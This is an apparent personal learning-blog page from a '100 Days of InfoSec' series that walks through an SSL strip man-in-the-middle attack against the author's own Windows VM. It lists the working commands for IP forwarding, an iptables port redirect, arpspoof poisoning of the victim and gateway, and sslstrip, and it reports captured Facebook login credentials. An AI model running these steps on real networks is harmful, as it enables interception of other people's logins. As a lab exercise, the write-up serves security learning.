<html>

<head>
  <meta content="text/html; charset=UTF-8" http-equiv="content-type">
  <title>Day 19</title>
  <style type="text/css">
    @import url('https://themes.googleusercontent.com/fonts/css?kit=-lTUqgJg2dxbe4D7B5DEID164ctO4cAXGRkC_ZwBWlzm74GqoUREvGx3nvtIBwYUN4duVc9C58uwPiY8_59Fz1glShGb2z8aYvkXhanuV50ibyMe4ukfvPvpfYEqkIMW');

    .lst-kix_3qpqsg34pnb6-0>li:before {
      content: ""counter(lst-ctn-kix_3qpqsg34pnb6-0, decimal) ". "
    }

    .lst-kix_3qpqsg34pnb6-2>li:before {
      content: ""counter(lst-ctn-kix_3qpqsg34pnb6-2, lower-roman) ". "
    }

    .lst-kix_3qpqsg34pnb6-3>li:before {
      content: ""counter(lst-ctn-kix_3qpqsg34pnb6-3, decimal) ". "
    }

    ol.lst-kix_3qpqsg34pnb6-1.start {
      counter-reset: lst-ctn-kix_3qpqsg34pnb6-1 0
    }

    .lst-kix_3qpqsg34pnb6-1>li:before {
      content: ""counter(lst-ctn-kix_3qpqsg34pnb6-1, lower-latin) ". "
    }

    .lst-kix_3qpqsg34pnb6-1>li {
      counter-increment: lst-ctn-kix_3qpqsg34pnb6-1
    }

    .lst-kix_2yzjaagjqxah-8>li:before {
      content: "\0025a0  "
    }

    ol.lst-kix_3qpqsg34pnb6-4.start {
      counter-reset: lst-ctn-kix_3qpqsg34pnb6-4 0
    }

    .lst-kix_5lp3gqbxm2h8-1>li:before {
      content: "\0025cb  "
    }

    .lst-kix_3qpqsg34pnb6-2>li {
      counter-increment: lst-ctn-kix_3qpqsg34pnb6-2
    }

    .lst-kix_5lp3gqbxm2h8-2>li:before {
      content: "\0025a0  "
    }

    ol.lst-kix_3qpqsg34pnb6-7.start {
      counter-reset: lst-ctn-kix_3qpqsg34pnb6-7 0
    }

    ul.lst-kix_hkg89eyxvtvi-0 {
      list-style-type: none
    }

    .lst-kix_5lp3gqbxm2h8-3>li:before {
      content: "\0025cf  "
    }

    .lst-kix_5lp3gqbxm2h8-4>li:before {
      content: "\0025cb  "
    }

    .lst-kix_5lp3gqbxm2h8-6>li:before {
      content: "\0025cf  "
    }

    .lst-kix_5lp3gqbxm2h8-5>li:before {
      content: "\0025a0  "
    }

    .lst-kix_3qpqsg34pnb6-8>li:before {
      content: ""counter(lst-ctn-kix_3qpqsg34pnb6-8, lower-roman) ". "
    }

    .lst-kix_5lp3gqbxm2h8-8>li:before {
      content: "\0025a0  "
    }

    .lst-kix_3qpqsg34pnb6-7>li:before {
      content: ""counter(lst-ctn-kix_3qpqsg34pnb6-7, lower-latin) ". "
    }

    .lst-kix_5lp3gqbxm2h8-7>li:before {
      content: "\0025cb  "
    }

    ul.lst-kix_hkg89eyxvtvi-1 {
      list-style-type: none
    }

    ul.lst-kix_hkg89eyxvtvi-2 {
      list-style-type: none
    }

    ul.lst-kix_hkg89eyxvtvi-3 {
      list-style-type: none
    }

    ul.lst-kix_hkg89eyxvtvi-4 {
      list-style-type: none
    }

    .lst-kix_3qpqsg34pnb6-4>li:before {
      content: ""counter(lst-ctn-kix_3qpqsg34pnb6-4, lower-latin) ". "
    }

    .lst-kix_3qpqsg34pnb6-6>li:before {
      content: ""counter(lst-ctn-kix_3qpqsg34pnb6-6, decimal) ". "
    }

    ul.lst-kix_hkg89eyxvtvi-5 {
      list-style-type: none
    }

    ul.lst-kix_hkg89eyxvtvi-6 {
      list-style-type: none
    }

    ul.lst-kix_hkg89eyxvtvi-7 {
      list-style-type: none
    }

    ul.lst-kix_hkg89eyxvtvi-8 {
      list-style-type: none
    }

    .lst-kix_3qpqsg34pnb6-5>li:before {
      content: ""counter(lst-ctn-kix_3qpqsg34pnb6-5, lower-roman) ". "
    }

    .lst-kix_kjisakvjzjsi-0>li:before {
      content: "\0025cf  "
    }

    .lst-kix_i6qpwdhuifir-8>li:before {
      content: "\0025a0  "
    }

    .lst-kix_kjisakvjzjsi-3>li:before {
      content: "\0025cf  "
    }

    .lst-kix_kjisakvjzjsi-4>li:before {
      content: "\0025cb  "
    }

    .lst-kix_kjisakvjzjsi-5>li:before {
      content: "\0025a0  "
    }

    .lst-kix_i6qpwdhuifir-3>li:before {
      content: "\0025cf  "
    }

    .lst-kix_kjisakvjzjsi-7>li:before {
      content: "\0025cb  "
    }

    .lst-kix_i6qpwdhuifir-2>li:before {
      content: "\0025a0  "
    }

    .lst-kix_kjisakvjzjsi-6>li:before {
      content: "\0025cf  "
    }

    .lst-kix_kjisakvjzjsi-8>li:before {
      content: "\0025a0  "
    }

    .lst-kix_i6qpwdhuifir-0>li:before {
      content: "\0025cf  "
    }

    .lst-kix_i6qpwdhuifir-1>li:before {
      content: "\0025cb  "
    }

    .lst-kix_hkg89eyxvtvi-0>li:before {
      content: "\0025cf  "
    }

    .lst-kix_hkg89eyxvtvi-1>li:before {
      content: "\0025cb  "
    }

    .lst-kix_5lp3gqbxm2h8-0>li:before {
      content: "\0025cf  "
    }

    .lst-kix_hkg89eyxvtvi-3>li:before {
      content: "\0025cf  "
    }

    .lst-kix_3qpqsg34pnb6-8>li {
      counter-increment: lst-ctn-kix_3qpqsg34pnb6-8
    }

    ul.lst-kix_5lp3gqbxm2h8-1 {
      list-style-type: none
    }

    ul.lst-kix_5lp3gqbxm2h8-0 {
      list-style-type: none
    }

    .lst-kix_hkg89eyxvtvi-2>li:before {
      content: "\0025a0  "
    }

    .lst-kix_hkg89eyxvtvi-5>li:before {
      content: "\0025a0  "
    }

    ul.lst-kix_i6qpwdhuifir-0 {
      list-style-type: none
    }

    ol.lst-kix_3qpqsg34pnb6-2.start {
      counter-reset: lst-ctn-kix_3qpqsg34pnb6-2 0
    }

    ul.lst-kix_i6qpwdhuifir-2 {
      list-style-type: none
    }

    ul.lst-kix_i6qpwdhuifir-1 {
      list-style-type: none
    }

    ul.lst-kix_i6qpwdhuifir-4 {
      list-style-type: none
    }

    .lst-kix_hkg89eyxvtvi-4>li:before {
      content: "\0025cb  "
    }

    ul.lst-kix_i6qpwdhuifir-3 {
      list-style-type: none
    }

    ul.lst-kix_i6qpwdhuifir-6 {
      list-style-type: none
    }

    ul.lst-kix_i6qpwdhuifir-5 {
      list-style-type: none
    }

    ul.lst-kix_i6qpwdhuifir-8 {
      list-style-type: none
    }

    ul.lst-kix_i6qpwdhuifir-7 {
      list-style-type: none
    }

    .lst-kix_hkg89eyxvtvi-7>li:before {
      content: "\0025cb  "
    }

    .lst-kix_i6qpwdhuifir-4>li:before {
      content: "\0025cb  "
    }

    .lst-kix_hkg89eyxvtvi-6>li:before {
      content: "\0025cf  "
    }

    ul.lst-kix_5lp3gqbxm2h8-5 {
      list-style-type: none
    }

    .lst-kix_i6qpwdhuifir-5>li:before {
      content: "\0025a0  "
    }

    .lst-kix_i6qpwdhuifir-6>li:before {
      content: "\0025cf  "
    }

    ul.lst-kix_5lp3gqbxm2h8-4 {
      list-style-type: none
    }

    ul.lst-kix_5lp3gqbxm2h8-3 {
      list-style-type: none
    }

    .lst-kix_kjisakvjzjsi-2>li:before {
      content: "\0025a0  "
    }

    ul.lst-kix_5lp3gqbxm2h8-2 {
      list-style-type: none
    }

    .lst-kix_kjisakvjzjsi-1>li:before {
      content: "\0025cb  "
    }

    .lst-kix_i6qpwdhuifir-7>li:before {
      content: "\0025cb  "
    }

    ul.lst-kix_5lp3gqbxm2h8-8 {
      list-style-type: none
    }

    .lst-kix_hkg89eyxvtvi-8>li:before {
      content: "\0025a0  "
    }

    ol.lst-kix_3qpqsg34pnb6-8.start {
      counter-reset: lst-ctn-kix_3qpqsg34pnb6-8 0
    }

    ul.lst-kix_5lp3gqbxm2h8-7 {
      list-style-type: none
    }

    ul.lst-kix_5lp3gqbxm2h8-6 {
      list-style-type: none
    }

    ul.lst-kix_2yzjaagjqxah-0 {
      list-style-type: none
    }

    ul.lst-kix_kjisakvjzjsi-8 {
      list-style-type: none
    }

    ul.lst-kix_kjisakvjzjsi-5 {
      list-style-type: none
    }

    ul.lst-kix_kjisakvjzjsi-4 {
      list-style-type: none
    }

    ul.lst-kix_kjisakvjzjsi-7 {
      list-style-type: none
    }

    ul.lst-kix_kjisakvjzjsi-6 {
      list-style-type: none
    }

    ul.lst-kix_2yzjaagjqxah-7 {
      list-style-type: none
    }

    .lst-kix_3qpqsg34pnb6-6>li {
      counter-increment: lst-ctn-kix_3qpqsg34pnb6-6
    }

    ul.lst-kix_2yzjaagjqxah-8 {
      list-style-type: none
    }

    ul.lst-kix_2yzjaagjqxah-5 {
      list-style-type: none
    }

    ul.lst-kix_2yzjaagjqxah-6 {
      list-style-type: none
    }

    ul.lst-kix_2yzjaagjqxah-3 {
      list-style-type: none
    }

    ul.lst-kix_2yzjaagjqxah-4 {
      list-style-type: none
    }

    ul.lst-kix_2yzjaagjqxah-1 {
      list-style-type: none
    }

    ul.lst-kix_2yzjaagjqxah-2 {
      list-style-type: none
    }

    ul.lst-kix_kjisakvjzjsi-1 {
      list-style-type: none
    }

    ul.lst-kix_kjisakvjzjsi-0 {
      list-style-type: none
    }

    ul.lst-kix_kjisakvjzjsi-3 {
      list-style-type: none
    }

    ul.lst-kix_kjisakvjzjsi-2 {
      list-style-type: none
    }

    .lst-kix_3qpqsg34pnb6-5>li {
      counter-increment: lst-ctn-kix_3qpqsg34pnb6-5
    }

    ol.lst-kix_3qpqsg34pnb6-0.start {
      counter-reset: lst-ctn-kix_3qpqsg34pnb6-0 0
    }

    ol.lst-kix_3qpqsg34pnb6-0 {
      list-style-type: none
    }

    ol.lst-kix_3qpqsg34pnb6-3.start {
      counter-reset: lst-ctn-kix_3qpqsg34pnb6-3 0
    }

    .lst-kix_3qpqsg34pnb6-4>li {
      counter-increment: lst-ctn-kix_3qpqsg34pnb6-4
    }

    .lst-kix_3qpqsg34pnb6-7>li {
      counter-increment: lst-ctn-kix_3qpqsg34pnb6-7
    }

    ol.lst-kix_3qpqsg34pnb6-6.start {
      counter-reset: lst-ctn-kix_3qpqsg34pnb6-6 0
    }

    ol.lst-kix_3qpqsg34pnb6-8 {
      list-style-type: none
    }

    ol.lst-kix_3qpqsg34pnb6-7 {
      list-style-type: none
    }

    ol.lst-kix_3qpqsg34pnb6-6 {
      list-style-type: none
    }

    ol.lst-kix_3qpqsg34pnb6-5 {
      list-style-type: none
    }

    ol.lst-kix_3qpqsg34pnb6-4 {
      list-style-type: none
    }

    ol.lst-kix_3qpqsg34pnb6-3 {
      list-style-type: none
    }

    ol.lst-kix_3qpqsg34pnb6-2 {
      list-style-type: none
    }

    ol.lst-kix_3qpqsg34pnb6-1 {
      list-style-type: none
    }

    .lst-kix_2yzjaagjqxah-7>li:before {
      content: "\0025cb  "
    }

    ol.lst-kix_3qpqsg34pnb6-5.start {
      counter-reset: lst-ctn-kix_3qpqsg34pnb6-5 0
    }

    .lst-kix_2yzjaagjqxah-6>li:before {
      content: "\0025cf  "
    }

    .lst-kix_2yzjaagjqxah-5>li:before {
      content: "\0025a0  "
    }

    .lst-kix_2yzjaagjqxah-2>li:before {
      content: "\0025a0  "
    }

    .lst-kix_2yzjaagjqxah-4>li:before {
      content: "\0025cb  "
    }

    .lst-kix_2yzjaagjqxah-3>li:before {
      content: "\0025cf  "
    }

    .lst-kix_3qpqsg34pnb6-3>li {
      counter-increment: lst-ctn-kix_3qpqsg34pnb6-3
    }

    .lst-kix_2yzjaagjqxah-0>li:before {
      content: "\0025cf  "
    }

    .lst-kix_3qpqsg34pnb6-0>li {
      counter-increment: lst-ctn-kix_3qpqsg34pnb6-0
    }

    .lst-kix_2yzjaagjqxah-1>li:before {
      content: "\0025cb  "
    }

    ol {
      margin: 0;
      padding: 0
    }

    table td,
    table th {
      padding: 0
    }

    .c1 {
      margin-left: 36pt;
      padding-top: 0pt;
      padding-left: 0pt;
      padding-bottom: 0pt;
      line-height: 1.15;
      orphans: 2;
      widows: 2;
      text-align: left
    }

    .c5 {
      color: #000000;
      font-weight: 400;
      text-decoration: none;
      vertical-align: baseline;
      font-size: 14pt;
      font-family: "Roboto Mono";
      font-style: normal
    }

    .c11 {
      color: #000000;
      font-weight: 400;
      text-decoration: none;
      vertical-align: baseline;
      font-size: 14pt;
      font-family: "Arial";
      font-style: normal
    }

    .c6 {
      color: #000000;
      font-weight: 800;
      text-decoration: none;
      vertical-align: baseline;
      font-size: 14pt;
      font-family: "Montserrat";
      font-style: normal
    }

    .c0 {
      color: #000000;
      font-weight: 300;
      text-decoration: none;
      vertical-align: baseline;
      font-size: 14pt;
      font-family: "Roboto Mono";
      font-style: normal
    }

    .c3 {
      color: #000000;
      font-weight: 400;
      text-decoration: none;
      vertical-align: baseline;
      font-size: 14pt;
      font-family: "Montserrat";
      font-style: normal
    }

    .c8 {
      color: #434343;
      font-weight: 400;
      text-decoration: none;
      vertical-align: baseline;
      font-size: 14pt;
      font-family: "Montserrat";
      font-style: normal
    }

    .c7 {
      padding-top: 14pt;
      padding-bottom: 4pt;
      line-height: 1.15;
      orphans: 2;
      widows: 2;
      text-align: left
    }

    .c13 {
      padding-top: 0pt;
      padding-bottom: 0pt;
      line-height: 1.15;
      orphans: 2;
      widows: 2;
      text-align: center
    }

    .c2 {
      padding-top: 0pt;
      padding-bottom: 0pt;
      line-height: 1.15;
      orphans: 2;
      widows: 2;
      text-align: left
    }

    .c12 {
      padding-top: 14pt;
      padding-bottom: 4pt;
      line-height: 1.15;
      orphans: 2;
      widows: 2;
      text-align: right
    }

    .c9 {
      font-size: 18pt;
      font-family: "Montserrat";
      color: #000000;
      font-weight: 900
    }

    .c15 {
      background-color: #ffffff;
      max-width: 600pt;
      ;
      padding: 72pt 72pt 72pt 72pt;
      margin: auto
    }

    .c14 {
      font-size: 14pt;
      font-family: "Roboto Mono";
      font-weight: 300
    }

    .c16 {
      padding: 0;
      margin: 0
    }

    .c10 {
      height: 14pt
    }

    .c4 {
      height: 11pt
    }

    .title {
      padding-top: 0pt;
      color: #000000;
      font-size: 26pt;
      padding-bottom: 3pt;
      font-family: "Arial";
      line-height: 1.15;
      page-break-after: avoid;
      orphans: 2;
      widows: 2;
      text-align: left
    }

    .subtitle {
      padding-top: 0pt;
      color: #666666;
      font-size: 15pt;
      padding-bottom: 16pt;
      font-family: "Arial";
      line-height: 1.15;
      page-break-after: avoid;
      orphans: 2;
      widows: 2;
      text-align: left
    }

    li {
      color: #000000;
      font-size: 11pt;
      font-family: "Arial"
    }

    p {
      margin: 0;
      color: #000000;
      font-size: 11pt;
      font-family: "Arial"
    }

    h1 {
      padding-top: 20pt;
      color: #000000;
      font-size: 20pt;
      padding-bottom: 6pt;
      font-family: "Arial";
      line-height: 1.15;
      page-break-after: avoid;
      orphans: 2;
      widows: 2;
      text-align: left
    }

    h2 {
      padding-top: 18pt;
      color: #000000;
      font-size: 16pt;
      padding-bottom: 6pt;
      font-family: "Arial";
      line-height: 1.15;
      page-break-after: avoid;
      orphans: 2;
      widows: 2;
      text-align: left
    }

    h3 {
      padding-top: 16pt;
      color: #434343;
      font-size: 14pt;
      padding-bottom: 4pt;
      font-family: "Arial";
      line-height: 1.15;
      page-break-after: avoid;
      orphans: 2;
      widows: 2;
      text-align: left
    }

    h4 {
      padding-top: 14pt;
      color: #666666;
      font-size: 12pt;
      padding-bottom: 4pt;
      font-family: "Arial";
      line-height: 1.15;
      page-break-after: avoid;
      orphans: 2;
      widows: 2;
      text-align: left
    }

    h5 {
      padding-top: 12pt;
      color: #666666;
      font-size: 11pt;
      padding-bottom: 4pt;
      font-family: "Arial";
      line-height: 1.15;
      page-break-after: avoid;
      orphans: 2;
      widows: 2;
      text-align: left
    }

    h6 {
      padding-top: 12pt;
      color: #666666;
      font-size: 11pt;
      padding-bottom: 4pt;
      font-family: "Arial";
      line-height: 1.15;
      page-break-after: avoid;
      font-style: italic;
      orphans: 2;
      widows: 2;
      text-align: left
    }
  </style>
</head>

<body class="c15">
  <h3 class="c12" id="h.3zvpwyx0el37"><span class="c9">20</span><span class="c9">/<br>100<br>Days<br>Of<br>InfoSec</span>
    <hr>
  </h3>
  <h3 class="c7" id="h.qwvdajocmuel"><span class="c6">SSL strip</span></h3>
  <p class="c2 c4"><span class="c11"></span></p>
  <p class="c2"><span class="c3">SSL stands for Secure Socket Layer and is responsible for &lsquo;s&rsquo; in the https://... (s for secure). SSL means that the data one sends to a website over the internet is encrypted and hence, cannot be read by
      any other person who may be eavesdropping.</span></p>
  <p class="c2 c4"><span class="c3"></span></p>
  <p class="c2"><span class="c3">SSL strip is a hacking technique where by an attacker can force a browser to strip the SSL layer and go to an http:// domain instead. Once that is achieved the attacker can eavesdrop and see your data (like username
      and password on facebook) in plaintext</span></p>
  <p class="c2 c4"><span class="c3"></span></p>
  <p class="c2"><span class="c3">I did a SSL strip today attack today on a windows VM. Tools used </span></p>
  <ol class="c16 lst-kix_3qpqsg34pnb6-0 start" start="1">
    <li class="c1"><span class="c14">iptables</span><span class="c3">&nbsp;for IP forwarding</span></li>
    <li class="c1"><span class="c14">arpspoof</span><span class="c3">&nbsp;for placing my kali machine as the MITM</span></li>
    <li class="c1"><span class="c14">sslstrip</span><span class="c3">&nbsp;for the actual attack</span></li>
  </ol>
  <p class="c2 c4"><span class="c3"></span></p>
  <p class="c2"><span class="c3">Commands : </span></p>
  <p class="c2 c4"><span class="c3"></span></p>
  <p class="c2"><span class="c5">To check if IP forwarding is enabled. &lsquo;0&rsquo; means its not</span></p>
  <p class="c2"><span class="c0">cat /proc/sys/net/ipv4/ip_forward</span></p>
  <p class="c2"><span class="c0">0</span></p>
  <p class="c2 c4"><span class="c0"></span></p>
  <p class="c2"><span class="c0">echo 1 &gt; /proc/sys/net/ipv4/ip_forward</span></p>
  <p class="c2"><span class="c0">1</span></p>
  <p class="c2 c4"><span class="c0"></span></p>
  <p class="c2"><span class="c5">Setup the IP forwarding using iptables</span></p>
  <p class="c2"><span class="c0">iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080</span></p>
  <p class="c2 c4"><span class="c0"></span></p>
  <p class="c2"><span class="c5">Check gateway IP</span></p>
  <p class="c2"><span class="c0">route -n</span></p>
  <p class="c2 c4"><span class="c0"></span></p>
  <p class="c2"><span
      style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 620.00px; height: 77.00px;"><img alt=""
        src="images/image4day20.png" style="width: 975.66px; height: 617.78px; margin-left: -33.57px; margin-top: -420.28px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);" title=""></span></p>
  <p class="c2 c4"><span class="c0"></span></p>
  <br>
  <p class="c2"><span class="c5">Install and run arpspoof (part of the dsniff package)</span></p>
  <p class="c2"><span class="c0">sudo apt-get install dsniff</span></p>
  <p class="c2"><span class="c0">arpspoof -i eth0 -t 10.0.2.4 10.0.2.1 </span></p>
  <p class="c2"><span class="c0">&nbsp; //10.0.2.4 - IP of the Windows VM</span></p>
  <p class="c2"><span class="c0">&nbsp; //10.0.2.1 - IP of the gateway</span></p>
  <p class="c2 c4"><span class="c0"></span></p>
  <p class="c2"><span
      style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 619.50px; height: 313.65px;"><img alt=""
        src="images/image2day20.png" style="width: 973.72px; height: 610.14px; margin-left: 0.00px; margin-top: -17.16px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);" title=""></span></p>
  <p class="c2 c4"><span class="c3"></span></p>
  <br>
  <p class="c2"><span class="c5">Install and run sslstrip in new kali terminal window</span></p>
  <p class="c2"><span class="c0">sudo apt-get install sslstrip</span></p>
  <p class="c2"><span class="c0">sslstrip -l 8080</span></p>
  <p class="c2 c4"><span class="c0"></span></p>
  <p class="c2"><span
      style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 617.00px; height: 180.00px;"><img alt=""
        src="images/image1day20.png" style="width: 1000.02px; height: 628.21px; margin-left: -48.08px; margin-top: -112.41px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);" title=""></span></p>
  <p class="c2 c4"><span class="c3"></span></p>
  <br>
  <p class="c2"><span class="c3">Now, open the Windows VM and go to facebook.com. You will notice that the browser takes you to the http:// domain instead of https://. Login with creds (I used johnny kabar)</span></p>
  <p class="c2 c4"><span class="c3"></span></p>
  <p class="c2"><span
      style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 624.00px; height: 339.00px;"><img alt=""
        src="images/image5day20.png" style="width: 624.00px; height: 391.00px; margin-left: 0.00px; margin-top: -20.00px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);" title=""></span></p>
  <p class="c2 c4"><span class="c3"></span></p>
  <br>
  <p class="c2"><span class="c5">Check sslstrip logs in new kali terminal window</span></p>
  <p class="c2"><span class="c0">cat ssltrip.log</span></p>
  <p class="c2 c4"><span class="c0"></span></p>
  <p class="c2"><span class="c3">And here are the credentials I entered!</span></p>
  <p class="c2 c4"><span class="c3"></span></p>
  <p class="c2"><span
      style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 606.00px; height: 215.00px;"><img alt=""
        src="images/image3day20.png" style="width: 1317.57px; height: 825.03px; margin-left: -711.57px; margin-top: -384.03px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);" title=""></span></p>
  <p class="c2 c4"><span class="c3"></span></p>
  <p class="c2 c4"><span class="c3"></span></p>
  <p class="c2 c4"><span class="c3"></span></p>
  <h3 class="c7 c10" id="h.dardaoz37s2v"><span class="c8"></span></h3>
  <hr>
  <p class="c13"><span class="c3">
      <a href='/100days/day18.html'>Previous</a>
      &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
      <a href='/100days/'>Home</a>
      &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
      <a href='/100days/day20.html'>Next</a>
    </span>
  </p>
</body>

</html>